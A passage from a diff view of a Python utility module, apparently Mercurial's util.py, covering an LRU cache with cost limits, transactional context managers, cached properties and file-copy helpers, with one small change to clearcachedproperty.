1154 class cowsortdict(cow, sortdict):
1154 class cowsortdict(cow, sortdict):
1155 """copy-on-write sortdict
1155 """copy-on-write sortdict
1156
1156
1157 Be sure to call d = d.preparewrite() before writing to d.
1157 Be sure to call d = d.preparewrite() before writing to d.
1158 """
1158 """
1159
1159
1160 class transactional(object):
1160 class transactional(object):
1161 """Base class for making a transactional type into a context manager."""
1161 """Base class for making a transactional type into a context manager."""
1162 __metaclass__ = abc.ABCMeta
1162 __metaclass__ = abc.ABCMeta
1163
1163
1164 @abc.abstractmethod
1164 @abc.abstractmethod
1165 def close(self):
1165 def close(self):
1166 """Successfully closes the transaction."""
1166 """Successfully closes the transaction."""
1167
1167
1168 @abc.abstractmethod
1168 @abc.abstractmethod
1169 def release(self):
1169 def release(self):
1170 """Marks the end of the transaction.
1170 """Marks the end of the transaction.
1171
1171
1172 If the transaction has not been closed, it will be aborted.
1172 If the transaction has not been closed, it will be aborted.
1173 """
1173 """
1174
1174
1175 def __enter__(self):
1175 def __enter__(self):
1176 return self
1176 return self
1177
1177
1178 def __exit__(self, exc_type, exc_val, exc_tb):
1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 try:
1179 try:
1180 if exc_type is None:
1180 if exc_type is None:
1181 self.close()
1181 self.close()
1182 finally:
1182 finally:
1183 self.release()
1183 self.release()
1184
1184
1185 @contextlib.contextmanager
1185 @contextlib.contextmanager
1186 def acceptintervention(tr=None):
1186 def acceptintervention(tr=None):
1187 """A context manager that closes the transaction on InterventionRequired
1187 """A context manager that closes the transaction on InterventionRequired
1188
1188
1189 If no transaction was provided, this simply runs the body and returns
1189 If no transaction was provided, this simply runs the body and returns
1190 """
1190 """
1191 if not tr:
1191 if not tr:
1192 yield
1192 yield
1193 return
1193 return
1194 try:
1194 try:
1195 yield
1195 yield
1196 tr.close()
1196 tr.close()
1197 except error.InterventionRequired:
1197 except error.InterventionRequired:
1198 tr.close()
1198 tr.close()
1199 raise
1199 raise
1200 finally:
1200 finally:
1201 tr.release()
1201 tr.release()
1202
1202
1203 @contextlib.contextmanager
1203 @contextlib.contextmanager
1204 def nullcontextmanager():
1204 def nullcontextmanager():
1205 yield
1205 yield
1206
1206
1207 class _lrucachenode(object):
1207 class _lrucachenode(object):
1208 """A node in a doubly linked list.
1208 """A node in a doubly linked list.
1209
1209
1210 Holds a reference to nodes on either side as well as a key-value
1210 Holds a reference to nodes on either side as well as a key-value
1211 pair for the dictionary entry.
1211 pair for the dictionary entry.
1212 """
1212 """
1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214
1214
1215 def __init__(self):
1215 def __init__(self):
1216 self.next = None
1216 self.next = None
1217 self.prev = None
1217 self.prev = None
1218
1218
1219 self.key = _notset
1219 self.key = _notset
1220 self.value = None
1220 self.value = None
1221 self.cost = 0
1221 self.cost = 0
1222
1222
1223 def markempty(self):
1223 def markempty(self):
1224 """Mark the node as emptied."""
1224 """Mark the node as emptied."""
1225 self.key = _notset
1225 self.key = _notset
1226 self.value = None
1226 self.value = None
1227 self.cost = 0
1227 self.cost = 0
1228
1228
1229 class lrucachedict(object):
1229 class lrucachedict(object):
1230 """Dict that caches most recent accesses and sets.
1230 """Dict that caches most recent accesses and sets.
1231
1231
1232 The dict consists of an actual backing dict - indexed by original
1232 The dict consists of an actual backing dict - indexed by original
1233 key - and a doubly linked circular list defining the order of entries in
1233 key - and a doubly linked circular list defining the order of entries in
1234 the cache.
1234 the cache.
1235
1235
1236 The head node is the newest entry in the cache. If the cache is full,
1236 The head node is the newest entry in the cache. If the cache is full,
1237 we recycle head.prev and make it the new head. Cache accesses result in
1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 the node being moved to before the existing head and being marked as the
1238 the node being moved to before the existing head and being marked as the
1239 new head node.
1239 new head node.
1240
1240
1241 Items in the cache can be inserted with an optional "cost" value. This is
1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 simply an integer that is specified by the caller. The cache can be queried
1242 simply an integer that is specified by the caller. The cache can be queried
1243 for the total cost of all items presently in the cache.
1243 for the total cost of all items presently in the cache.
1244
1244
1245 The cache can also define a maximum cost. If a cache insertion would
1245 The cache can also define a maximum cost. If a cache insertion would
1246 cause the total cost of the cache to go beyond the maximum cost limit,
1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 nodes will be evicted to make room for the new code. This can be used
1247 nodes will be evicted to make room for the new code. This can be used
1248 to e.g. set a max memory limit and associate an estimated bytes size
1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 cost to each item in the cache. By default, no maximum cost is enforced.
1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 """
1250 """
1251 def __init__(self, max, maxcost=0):
1251 def __init__(self, max, maxcost=0):
1252 self._cache = {}
1252 self._cache = {}
1253
1253
1254 self._head = head = _lrucachenode()
1254 self._head = head = _lrucachenode()
1255 head.prev = head
1255 head.prev = head
1256 head.next = head
1256 head.next = head
1257 self._size = 1
1257 self._size = 1
1258 self.capacity = max
1258 self.capacity = max
1259 self.totalcost = 0
1259 self.totalcost = 0
1260 self.maxcost = maxcost
1260 self.maxcost = maxcost
1261
1261
1262 def __len__(self):
1262 def __len__(self):
1263 return len(self._cache)
1263 return len(self._cache)
1264
1264
1265 def __contains__(self, k):
1265 def __contains__(self, k):
1266 return k in self._cache
1266 return k in self._cache
1267
1267
1268 def __iter__(self):
1268 def __iter__(self):
1269 # We don't have to iterate in cache order, but why not.
1269 # We don't have to iterate in cache order, but why not.
1270 n = self._head
1270 n = self._head
1271 for i in range(len(self._cache)):
1271 for i in range(len(self._cache)):
1272 yield n.key
1272 yield n.key
1273 n = n.next
1273 n = n.next
1274
1274
1275 def __getitem__(self, k):
1275 def __getitem__(self, k):
1276 node = self._cache[k]
1276 node = self._cache[k]
1277 self._movetohead(node)
1277 self._movetohead(node)
1278 return node.value
1278 return node.value
1279
1279
1280 def insert(self, k, v, cost=0):
1280 def insert(self, k, v, cost=0):
1281 """Insert a new item in the cache with optional cost value."""
1281 """Insert a new item in the cache with optional cost value."""
1282 node = self._cache.get(k)
1282 node = self._cache.get(k)
1283 # Replace existing value and mark as newest.
1283 # Replace existing value and mark as newest.
1284 if node is not None:
1284 if node is not None:
1285 self.totalcost -= node.cost
1285 self.totalcost -= node.cost
1286 node.value = v
1286 node.value = v
1287 node.cost = cost
1287 node.cost = cost
1288 self.totalcost += cost
1288 self.totalcost += cost
1289 self._movetohead(node)
1289 self._movetohead(node)
1290
1290
1291 if self.maxcost:
1291 if self.maxcost:
1292 self._enforcecostlimit()
1292 self._enforcecostlimit()
1293
1293
1294 return
1294 return
1295
1295
1296 if self._size < self.capacity:
1296 if self._size < self.capacity:
1297 node = self._addcapacity()
1297 node = self._addcapacity()
1298 else:
1298 else:
1299 # Grab the last/oldest item.
1299 # Grab the last/oldest item.
1300 node = self._head.prev
1300 node = self._head.prev
1301
1301
1302 # At capacity. Kill the old entry.
1302 # At capacity. Kill the old entry.
1303 if node.key is not _notset:
1303 if node.key is not _notset:
1304 self.totalcost -= node.cost
1304 self.totalcost -= node.cost
1305 del self._cache[node.key]
1305 del self._cache[node.key]
1306
1306
1307 node.key = k
1307 node.key = k
1308 node.value = v
1308 node.value = v
1309 node.cost = cost
1309 node.cost = cost
1310 self.totalcost += cost
1310 self.totalcost += cost
1311 self._cache[k] = node
1311 self._cache[k] = node
1312 # And mark it as newest entry. No need to adjust order since it
1312 # And mark it as newest entry. No need to adjust order since it
1313 # is already self._head.prev.
1313 # is already self._head.prev.
1314 self._head = node
1314 self._head = node
1315
1315
1316 if self.maxcost:
1316 if self.maxcost:
1317 self._enforcecostlimit()
1317 self._enforcecostlimit()
1318
1318
1319 def __setitem__(self, k, v):
1319 def __setitem__(self, k, v):
1320 self.insert(k, v)
1320 self.insert(k, v)
1321
1321
1322 def __delitem__(self, k):
1322 def __delitem__(self, k):
1323 node = self._cache.pop(k)
1323 node = self._cache.pop(k)
1324 self.totalcost -= node.cost
1324 self.totalcost -= node.cost
1325 node.markempty()
1325 node.markempty()
1326
1326
1327 # Temporarily mark as newest item before re-adjusting head to make
1327 # Temporarily mark as newest item before re-adjusting head to make
1328 # this node the oldest item.
1328 # this node the oldest item.
1329 self._movetohead(node)
1329 self._movetohead(node)
1330 self._head = node.next
1330 self._head = node.next
1331
1331
1332 # Additional dict methods.
1332 # Additional dict methods.
1333
1333
1334 def get(self, k, default=None):
1334 def get(self, k, default=None):
1335 try:
1335 try:
1336 return self.__getitem__(k)
1336 return self.__getitem__(k)
1337 except KeyError:
1337 except KeyError:
1338 return default
1338 return default
1339
1339
1340 def clear(self):
1340 def clear(self):
1341 n = self._head
1341 n = self._head
1342 while n.key is not _notset:
1342 while n.key is not _notset:
1343 self.totalcost -= n.cost
1343 self.totalcost -= n.cost
1344 n.markempty()
1344 n.markempty()
1345 n = n.next
1345 n = n.next
1346
1346
1347 self._cache.clear()
1347 self._cache.clear()
1348
1348
1349 def copy(self, capacity=None, maxcost=0):
1349 def copy(self, capacity=None, maxcost=0):
1350 """Create a new cache as a copy of the current one.
1350 """Create a new cache as a copy of the current one.
1351
1351
1352 By default, the new cache has the same capacity as the existing one.
1352 By default, the new cache has the same capacity as the existing one.
1353 But, the cache capacity can be changed as part of performing the
1353 But, the cache capacity can be changed as part of performing the
1354 copy.
1354 copy.
1355
1355
1356 Items in the copy have an insertion/access order matching this
1356 Items in the copy have an insertion/access order matching this
1357 instance.
1357 instance.
1358 """
1358 """
1359
1359
1360 capacity = capacity or self.capacity
1360 capacity = capacity or self.capacity
1361 maxcost = maxcost or self.maxcost
1361 maxcost = maxcost or self.maxcost
1362 result = lrucachedict(capacity, maxcost=maxcost)
1362 result = lrucachedict(capacity, maxcost=maxcost)
1363
1363
1364 # We copy entries by iterating in oldest-to-newest order so the copy
1364 # We copy entries by iterating in oldest-to-newest order so the copy
1365 # has the correct ordering.
1365 # has the correct ordering.
1366
1366
1367 # Find the first non-empty entry.
1367 # Find the first non-empty entry.
1368 n = self._head.prev
1368 n = self._head.prev
1369 while n.key is _notset and n is not self._head:
1369 while n.key is _notset and n is not self._head:
1370 n = n.prev
1370 n = n.prev
1371
1371
1372 # We could potentially skip the first N items when decreasing capacity.
1372 # We could potentially skip the first N items when decreasing capacity.
1373 # But let's keep it simple unless it is a performance problem.
1373 # But let's keep it simple unless it is a performance problem.
1374 for i in range(len(self._cache)):
1374 for i in range(len(self._cache)):
1375 result.insert(n.key, n.value, cost=n.cost)
1375 result.insert(n.key, n.value, cost=n.cost)
1376 n = n.prev
1376 n = n.prev
1377
1377
1378 return result
1378 return result
1379
1379
1380 def popoldest(self):
1380 def popoldest(self):
1381 """Remove the oldest item from the cache.
1381 """Remove the oldest item from the cache.
1382
1382
1383 Returns the (key, value) describing the removed cache entry.
1383 Returns the (key, value) describing the removed cache entry.
1384 """
1384 """
1385 if not self._cache:
1385 if not self._cache:
1386 return
1386 return
1387
1387
1388 # Walk the linked list backwards starting at tail node until we hit
1388 # Walk the linked list backwards starting at tail node until we hit
1389 # a non-empty node.
1389 # a non-empty node.
1390 n = self._head.prev
1390 n = self._head.prev
1391 while n.key is _notset:
1391 while n.key is _notset:
1392 n = n.prev
1392 n = n.prev
1393
1393
1394 key, value = n.key, n.value
1394 key, value = n.key, n.value
1395
1395
1396 # And remove it from the cache and mark it as empty.
1396 # And remove it from the cache and mark it as empty.
1397 del self._cache[n.key]
1397 del self._cache[n.key]
1398 self.totalcost -= n.cost
1398 self.totalcost -= n.cost
1399 n.markempty()
1399 n.markempty()
1400
1400
1401 return key, value
1401 return key, value
1402
1402
1403 def _movetohead(self, node):
1403 def _movetohead(self, node):
1404 """Mark a node as the newest, making it the new head.
1404 """Mark a node as the newest, making it the new head.
1405
1405
1406 When a node is accessed, it becomes the freshest entry in the LRU
1406 When a node is accessed, it becomes the freshest entry in the LRU
1407 list, which is denoted by self._head.
1407 list, which is denoted by self._head.
1408
1408
1409 Visually, let's make ``N`` the new head node (* denotes head):
1409 Visually, let's make ``N`` the new head node (* denotes head):
1410
1410
1411 previous/oldest <-> head <-> next/next newest
1411 previous/oldest <-> head <-> next/next newest
1412
1412
1413 ----<->--- A* ---<->-----
1413 ----<->--- A* ---<->-----
1414 | |
1414 | |
1415 E <-> D <-> N <-> C <-> B
1415 E <-> D <-> N <-> C <-> B
1416
1416
1417 To:
1417 To:
1418
1418
1419 ----<->--- N* ---<->-----
1419 ----<->--- N* ---<->-----
1420 | |
1420 | |
1421 E <-> D <-> C <-> B <-> A
1421 E <-> D <-> C <-> B <-> A
1422
1422
1423 This requires the following moves:
1423 This requires the following moves:
1424
1424
1425 C.next = D (node.prev.next = node.next)
1425 C.next = D (node.prev.next = node.next)
1426 D.prev = C (node.next.prev = node.prev)
1426 D.prev = C (node.next.prev = node.prev)
1427 E.next = N (head.prev.next = node)
1427 E.next = N (head.prev.next = node)
1428 N.prev = E (node.prev = head.prev)
1428 N.prev = E (node.prev = head.prev)
1429 N.next = A (node.next = head)
1429 N.next = A (node.next = head)
1430 A.prev = N (head.prev = node)
1430 A.prev = N (head.prev = node)
1431 """
1431 """
1432 head = self._head
1432 head = self._head
1433 # C.next = D
1433 # C.next = D
1434 node.prev.next = node.next
1434 node.prev.next = node.next
1435 # D.prev = C
1435 # D.prev = C
1436 node.next.prev = node.prev
1436 node.next.prev = node.prev
1437 # N.prev = E
1437 # N.prev = E
1438 node.prev = head.prev
1438 node.prev = head.prev
1439 # N.next = A
1439 # N.next = A
1440 # It is tempting to do just "head" here, however if node is
1440 # It is tempting to do just "head" here, however if node is
1441 # adjacent to head, this will do bad things.
1441 # adjacent to head, this will do bad things.
1442 node.next = head.prev.next
1442 node.next = head.prev.next
1443 # E.next = N
1443 # E.next = N
1444 node.next.prev = node
1444 node.next.prev = node
1445 # A.prev = N
1445 # A.prev = N
1446 node.prev.next = node
1446 node.prev.next = node
1447
1447
1448 self._head = node
1448 self._head = node
1449
1449
1450 def _addcapacity(self):
1450 def _addcapacity(self):
1451 """Add a node to the circular linked list.
1451 """Add a node to the circular linked list.
1452
1452
1453 The new node is inserted before the head node.
1453 The new node is inserted before the head node.
1454 """
1454 """
1455 head = self._head
1455 head = self._head
1456 node = _lrucachenode()
1456 node = _lrucachenode()
1457 head.prev.next = node
1457 head.prev.next = node
1458 node.prev = head.prev
1458 node.prev = head.prev
1459 node.next = head
1459 node.next = head
1460 head.prev = node
1460 head.prev = node
1461 self._size += 1
1461 self._size += 1
1462 return node
1462 return node
1463
1463
1464 def _enforcecostlimit(self):
1464 def _enforcecostlimit(self):
1465 # This should run after an insertion. It should only be called if total
1465 # This should run after an insertion. It should only be called if total
1466 # cost limits are being enforced.
1466 # cost limits are being enforced.
1467 # The most recently inserted node is never evicted.
1467 # The most recently inserted node is never evicted.
1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 return
1469 return
1470
1470
1471 # This is logically equivalent to calling popoldest() until we
1471 # This is logically equivalent to calling popoldest() until we
1472 # free up enough cost. We don't do that since popoldest() needs
1472 # free up enough cost. We don't do that since popoldest() needs
1473 # to walk the linked list and doing this in a loop would be
1473 # to walk the linked list and doing this in a loop would be
1474 # quadratic. So we find the first non-empty node and then
1474 # quadratic. So we find the first non-empty node and then
1475 # walk nodes until we free up enough capacity.
1475 # walk nodes until we free up enough capacity.
1476 #
1476 #
1477 # If we only removed the minimum number of nodes to free enough
1477 # If we only removed the minimum number of nodes to free enough
1478 # cost at insert time, chances are high that the next insert would
1478 # cost at insert time, chances are high that the next insert would
1479 # also require pruning. This would effectively constitute quadratic
1479 # also require pruning. This would effectively constitute quadratic
1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 # target cost that is a percentage of the max cost. This will tend
1481 # target cost that is a percentage of the max cost. This will tend
1482 # to free more nodes when the high water mark is reached, which
1482 # to free more nodes when the high water mark is reached, which
1483 # lowers the chances of needing to prune on the subsequent insert.
1483 # lowers the chances of needing to prune on the subsequent insert.
1484 targetcost = int(self.maxcost * 0.75)
1484 targetcost = int(self.maxcost * 0.75)
1485
1485
1486 n = self._head.prev
1486 n = self._head.prev
1487 while n.key is _notset:
1487 while n.key is _notset:
1488 n = n.prev
1488 n = n.prev
1489
1489
1490 while len(self) > 1 and self.totalcost > targetcost:
1490 while len(self) > 1 and self.totalcost > targetcost:
1491 del self._cache[n.key]
1491 del self._cache[n.key]
1492 self.totalcost -= n.cost
1492 self.totalcost -= n.cost
1493 n.markempty()
1493 n.markempty()
1494 n = n.prev
1494 n = n.prev
1495
1495
1496 def lrucachefunc(func):
1496 def lrucachefunc(func):
1497 '''cache most recent results of function calls'''
1497 '''cache most recent results of function calls'''
1498 cache = {}
1498 cache = {}
1499 order = collections.deque()
1499 order = collections.deque()
1500 if func.__code__.co_argcount == 1:
1500 if func.__code__.co_argcount == 1:
1501 def f(arg):
1501 def f(arg):
1502 if arg not in cache:
1502 if arg not in cache:
1503 if len(cache) > 20:
1503 if len(cache) > 20:
1504 del cache[order.popleft()]
1504 del cache[order.popleft()]
1505 cache[arg] = func(arg)
1505 cache[arg] = func(arg)
1506 else:
1506 else:
1507 order.remove(arg)
1507 order.remove(arg)
1508 order.append(arg)
1508 order.append(arg)
1509 return cache[arg]
1509 return cache[arg]
1510 else:
1510 else:
1511 def f(*args):
1511 def f(*args):
1512 if args not in cache:
1512 if args not in cache:
1513 if len(cache) > 20:
1513 if len(cache) > 20:
1514 del cache[order.popleft()]
1514 del cache[order.popleft()]
1515 cache[args] = func(*args)
1515 cache[args] = func(*args)
1516 else:
1516 else:
1517 order.remove(args)
1517 order.remove(args)
1518 order.append(args)
1518 order.append(args)
1519 return cache[args]
1519 return cache[args]
1520
1520
1521 return f
1521 return f
1522
1522
1523 class propertycache(object):
1523 class propertycache(object):
1524 def __init__(self, func):
1524 def __init__(self, func):
1525 self.func = func
1525 self.func = func
1526 self.name = func.__name__
1526 self.name = func.__name__
1527 def __get__(self, obj, type=None):
1527 def __get__(self, obj, type=None):
1528 result = self.func(obj)
1528 result = self.func(obj)
1529 self.cachevalue(obj, result)
1529 self.cachevalue(obj, result)
1530 return result
1530 return result
1531
1531
1532 def cachevalue(self, obj, value):
1532 def cachevalue(self, obj, value):
1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 obj.__dict__[self.name] = value
1534 obj.__dict__[self.name] = value
1535
1535
1536 def clearcachedproperty(obj, prop):
1536 def clearcachedproperty(obj, prop):
1537 '''clear a cached property value, if one has been set'''
1537 '''clear a cached property value, if one has been set'''
1538 prop = pycompat.sysstr(prop)
1538 if prop in obj.__dict__:
1539 if prop in obj.__dict__:
1539 del obj.__dict__[prop]
1540 del obj.__dict__[prop]
1540
1541
1541 def increasingchunks(source, min=1024, max=65536):
1542 def increasingchunks(source, min=1024, max=65536):
1542 '''return no less than min bytes per chunk while data remains,
1543 '''return no less than min bytes per chunk while data remains,
1543 doubling min after each chunk until it reaches max'''
1544 doubling min after each chunk until it reaches max'''
1544 def log2(x):
1545 def log2(x):
1545 if not x:
1546 if not x:
1546 return 0
1547 return 0
1547 i = 0
1548 i = 0
1548 while x:
1549 while x:
1549 x >>= 1
1550 x >>= 1
1550 i += 1
1551 i += 1
1551 return i - 1
1552 return i - 1
1552
1553
1553 buf = []
1554 buf = []
1554 blen = 0
1555 blen = 0
1555 for chunk in source:
1556 for chunk in source:
1556 buf.append(chunk)
1557 buf.append(chunk)
1557 blen += len(chunk)
1558 blen += len(chunk)
1558 if blen >= min:
1559 if blen >= min:
1559 if min < max:
1560 if min < max:
1560 min = min << 1
1561 min = min << 1
1561 nmin = 1 << log2(blen)
1562 nmin = 1 << log2(blen)
1562 if nmin > min:
1563 if nmin > min:
1563 min = nmin
1564 min = nmin
1564 if min > max:
1565 if min > max:
1565 min = max
1566 min = max
1566 yield ''.join(buf)
1567 yield ''.join(buf)
1567 blen = 0
1568 blen = 0
1568 buf = []
1569 buf = []
1569 if buf:
1570 if buf:
1570 yield ''.join(buf)
1571 yield ''.join(buf)
1571
1572
1572 def always(fn):
1573 def always(fn):
1573 return True
1574 return True
1574
1575
1575 def never(fn):
1576 def never(fn):
1576 return False
1577 return False
1577
1578
1578 def nogc(func):
1579 def nogc(func):
1579 """disable garbage collector
1580 """disable garbage collector
1580
1581
1581 Python's garbage collector triggers a GC each time a certain number of
1582 Python's garbage collector triggers a GC each time a certain number of
1582 container objects (the number being defined by gc.get_threshold()) are
1583 container objects (the number being defined by gc.get_threshold()) are
1583 allocated even when marked not to be tracked by the collector. Tracking has
1584 allocated even when marked not to be tracked by the collector. Tracking has
1584 no effect on when GCs are triggered, only on what objects the GC looks
1585 no effect on when GCs are triggered, only on what objects the GC looks
1585 into. As a workaround, disable GC while building complex (huge)
1586 into. As a workaround, disable GC while building complex (huge)
1586 containers.
1587 containers.
1587
1588
1588 This garbage collector issue have been fixed in 2.7. But it still affect
1589 This garbage collector issue have been fixed in 2.7. But it still affect
1589 CPython's performance.
1590 CPython's performance.
1590 """
1591 """
1591 def wrapper(*args, **kwargs):
1592 def wrapper(*args, **kwargs):
1592 gcenabled = gc.isenabled()
1593 gcenabled = gc.isenabled()
1593 gc.disable()
1594 gc.disable()
1594 try:
1595 try:
1595 return func(*args, **kwargs)
1596 return func(*args, **kwargs)
1596 finally:
1597 finally:
1597 if gcenabled:
1598 if gcenabled:
1598 gc.enable()
1599 gc.enable()
1599 return wrapper
1600 return wrapper
1600
1601
1601 if pycompat.ispypy:
1602 if pycompat.ispypy:
1602 # PyPy runs slower with gc disabled
1603 # PyPy runs slower with gc disabled
1603 nogc = lambda x: x
1604 nogc = lambda x: x
1604
1605
1605 def pathto(root, n1, n2):
1606 def pathto(root, n1, n2):
1606 '''return the relative path from one place to another.
1607 '''return the relative path from one place to another.
1607 root should use os.sep to separate directories
1608 root should use os.sep to separate directories
1608 n1 should use os.sep to separate directories
1609 n1 should use os.sep to separate directories
1609 n2 should use "/" to separate directories
1610 n2 should use "/" to separate directories
1610 returns an os.sep-separated path.
1611 returns an os.sep-separated path.
1611
1612
1612 If n1 is a relative path, it's assumed it's
1613 If n1 is a relative path, it's assumed it's
1613 relative to root.
1614 relative to root.
1614 n2 should always be relative to root.
1615 n2 should always be relative to root.
1615 '''
1616 '''
1616 if not n1:
1617 if not n1:
1617 return localpath(n2)
1618 return localpath(n2)
1618 if os.path.isabs(n1):
1619 if os.path.isabs(n1):
1619 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1620 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1620 return os.path.join(root, localpath(n2))
1621 return os.path.join(root, localpath(n2))
1621 n2 = '/'.join((pconvert(root), n2))
1622 n2 = '/'.join((pconvert(root), n2))
1622 a, b = splitpath(n1), n2.split('/')
1623 a, b = splitpath(n1), n2.split('/')
1623 a.reverse()
1624 a.reverse()
1624 b.reverse()
1625 b.reverse()
1625 while a and b and a[-1] == b[-1]:
1626 while a and b and a[-1] == b[-1]:
1626 a.pop()
1627 a.pop()
1627 b.pop()
1628 b.pop()
1628 b.reverse()
1629 b.reverse()
1629 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1630 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1630
1631
1631 # the location of data files matching the source code
1632 # the location of data files matching the source code
1632 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1633 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1633 # executable version (py2exe) doesn't support __file__
1634 # executable version (py2exe) doesn't support __file__
1634 datapath = os.path.dirname(pycompat.sysexecutable)
1635 datapath = os.path.dirname(pycompat.sysexecutable)
1635 else:
1636 else:
1636 datapath = os.path.dirname(pycompat.fsencode(__file__))
1637 datapath = os.path.dirname(pycompat.fsencode(__file__))
1637
1638
1638 i18n.setdatapath(datapath)
1639 i18n.setdatapath(datapath)
1639
1640
1640 def checksignature(func):
1641 def checksignature(func):
1641 '''wrap a function with code to check for calling errors'''
1642 '''wrap a function with code to check for calling errors'''
1642 def check(*args, **kwargs):
1643 def check(*args, **kwargs):
1643 try:
1644 try:
1644 return func(*args, **kwargs)
1645 return func(*args, **kwargs)
1645 except TypeError:
1646 except TypeError:
1646 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1647 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1647 raise error.SignatureError
1648 raise error.SignatureError
1648 raise
1649 raise
1649
1650
1650 return check
1651 return check
1651
1652
1652 # a whilelist of known filesystems where hardlink works reliably
1653 # a whilelist of known filesystems where hardlink works reliably
1653 _hardlinkfswhitelist = {
1654 _hardlinkfswhitelist = {
1654 'apfs',
1655 'apfs',
1655 'btrfs',
1656 'btrfs',
1656 'ext2',
1657 'ext2',
1657 'ext3',
1658 'ext3',
1658 'ext4',
1659 'ext4',
1659 'hfs',
1660 'hfs',
1660 'jfs',
1661 'jfs',
1661 'NTFS',
1662 'NTFS',
1662 'reiserfs',
1663 'reiserfs',
1663 'tmpfs',
1664 'tmpfs',
1664 'ufs',
1665 'ufs',
1665 'xfs',
1666 'xfs',
1666 'zfs',
1667 'zfs',
1667 }
1668 }
1668
1669
1669 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1670 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1670 '''copy a file, preserving mode and optionally other stat info like
1671 '''copy a file, preserving mode and optionally other stat info like
1671 atime/mtime
1672 atime/mtime
1672
1673
1673 checkambig argument is used with filestat, and is useful only if
1674 checkambig argument is used with filestat, and is useful only if
1674 destination file is guarded by any lock (e.g. repo.lock or
1675 destination file is guarded by any lock (e.g. repo.lock or
1675 repo.wlock).
1676 repo.wlock).
1676
1677
1677 copystat and checkambig should be exclusive.
1678 copystat and checkambig should be exclusive.
1678 '''
1679 '''
1679 assert not (copystat and checkambig)
1680 assert not (copystat and checkambig)
1680 oldstat = None
1681 oldstat = None
1681 if os.path.lexists(dest):
1682 if os.path.lexists(dest):
1682 if checkambig:
1683 if checkambig:
1683 oldstat = checkambig and filestat.frompath(dest)
1684 oldstat = checkambig and filestat.frompath(dest)
1684 unlink(dest)
1685 unlink(dest)
1685 if hardlink:
1686 if hardlink:
1686 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1687 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1687 # unless we are confident that dest is on a whitelisted filesystem.
1688 # unless we are confident that dest is on a whitelisted filesystem.
1688 try:
1689 try:
1689 fstype = getfstype(os.path.dirname(dest))
1690 fstype = getfstype(os.path.dirname(dest))
1690 except OSError:
1691 except OSError:
1691 fstype = None
1692 fstype = None
1692 if fstype not in _hardlinkfswhitelist:
1693 if fstype not in _hardlinkfswhitelist:
1693 hardlink = False
1694 hardlink = False
1694 if hardlink:
1695 if hardlink:
1695 try:
1696 try:
1696 oslink(src, dest)
1697 oslink(src, dest)
1697 return
1698 return
1698 except (IOError, OSError):
1699 except (IOError, OSError):
1699 pass # fall back to normal copy
1700 pass # fall back to normal copy
1700 if os.path.islink(src):
1701 if os.path.islink(src):
1701 os.symlink(os.readlink(src), dest)
1702 os.symlink(os.readlink(src), dest)
1702 # copytime is ignored for symlinks, but in general copytime isn't needed
1703 # copytime is ignored for symlinks, but in general copytime isn't needed
1703 # for them anyway
1704 # for them anyway
1704 else:
1705 else:
1705 try:
1706 try:
1706 shutil.copyfile(src, dest)
1707 shutil.copyfile(src, dest)
1707 if copystat:
1708 if copystat:
1708 # copystat also copies mode
1709 # copystat also copies mode
1709 shutil.copystat(src, dest)
1710 shutil.copystat(src, dest)
1710 else:
1711 else:
1711 shutil.copymode(src, dest)
1712 shutil.copymode(src, dest)
1712 if oldstat and oldstat.stat:
1713 if oldstat and oldstat.stat:
1713 newstat = filestat.frompath(dest)
1714 newstat = filestat.frompath(dest)
1714 if newstat.isambig(oldstat):
1715 if newstat.isambig(oldstat):
1715 # stat of copied file is ambiguous to original one
1716 # stat of copied file is ambiguous to original one
1716 advanced = (
1717 advanced = (
1717 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1718 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1718 os.utime(dest, (advanced, advanced))
1719 os.utime(dest, (advanced, advanced))
1719 except shutil.Error as inst:
1720 except shutil.Error as inst:
1720 raise error.Abort(str(inst))
1721 raise error.Abort(str(inst))
1721
1722
1722 def copyfiles(src, dst, hardlink=None, progress=None):
1723 def copyfiles(src, dst, hardlink=None, progress=None):
1723 """Copy a directory tree using hardlinks if possible."""
1724 """Copy a directory tree using hardlinks if possible."""
1724 num = 0
1725 num = 0
1725
1726
1726 def settopic():
1727 def settopic():
1727 if progress:
1728 if progress:
1728 progress.topic = _('linking') if hardlink else _('copying')
1729 progress.topic = _('linking') if hardlink else _('copying')
1729
1730
1730 if os.path.isdir(src):
1731 if os.path.isdir(src):
1731 if hardlink is None:
1732 if hardlink is None:
1732 hardlink = (os.stat(src).st_dev ==
1733 hardlink = (os.stat(src).st_dev ==
1733 os.stat(os.path.dirname(dst)).st_dev)
1734 os.stat(os.path.dirname(dst)).st_dev)
1734 settopic()
1735 settopic()
1735 os.mkdir(dst)
1736 os.mkdir(dst)
1736 for name, kind in listdir(src):
1737 for name, kind in listdir(src):
1737 srcname = os.path.join(src, name)
1738 srcname = os.path.join(src, name)
1738 dstname = os.path.join(dst, name)
1739 dstname = os.path.join(dst, name)
1739 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1740 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1740 num += n
